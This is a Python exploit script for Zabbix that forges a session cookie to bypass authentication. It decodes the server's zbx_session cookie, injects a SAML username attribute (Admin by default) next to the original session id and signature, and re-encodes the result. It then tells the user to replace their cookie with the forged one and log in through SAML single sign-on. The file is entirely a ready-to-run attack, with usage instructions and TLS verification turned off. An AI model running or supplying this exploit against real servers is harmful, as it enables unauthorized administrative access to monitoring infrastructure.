zabbix_session_exp.py

import requests
import re
import urllib.parse
import base64
import json
import sys
import urllib3
urllib3.disable_warnings()

def highligth_green(msg):
    return "\033[0;32;40m{}\033[0m".format(msg)


def highlight_yellow(msg):
    return "\033[0;33;40m{}\033[0m".format(msg)

def exp(target, username):
    resp = requests.get(url=target, verify=False)
    cookie = resp.headers.get("Set-Cookie")

    zbx_session = re.findall(r"zbx_session=(.*?); ", cookie)

    url_decode_data = urllib.parse.unquote(zbx_session[0], encoding='utf-8')	
    base64_decode_data = base64.b64decode(url_decode_data)

    decode_to_str = str(base64_decode_data, encoding='utf-8')

    to_json = json.loads(decode_to_str)

    tmp_ojb = dict(saml_data=dict(username_attribute=username), sessionid=to_json["sessionid"], sign=to_json["sign"])

    payloadJson = json.dumps(tmp_ojb)
    # print("[*] decode_payload:", payloadJson)

    payload = urllib.parse.quote(base64.b64encode(payloadJson.encode()))
    print("[+] zbx_signed_session:", highlight_yellow(payload))
    print("[+] Visit {}, use zbx_signed_session replace cookie".format(target))
    print("[+] Click "+ highligth_green("Sign in with Single Sign-On (SAML)") + " to login" )



def usage():
    print("Usage:")
    print("\tpython3 zabbix_session_exp.py <TARGET> [USERNAME]\t Default username: Admin")

if __name__ == "__main__":
    if len(sys.argv) == 1:
        usage()
        exit(0)
    elif len(sys.argv) == 2:
        target = sys.argv[1]
        username = "Admin"
    elif len(sys.argv) == 3:
        target = sys.argv[1]
        username = sys.argv[2]

    exp(target, username)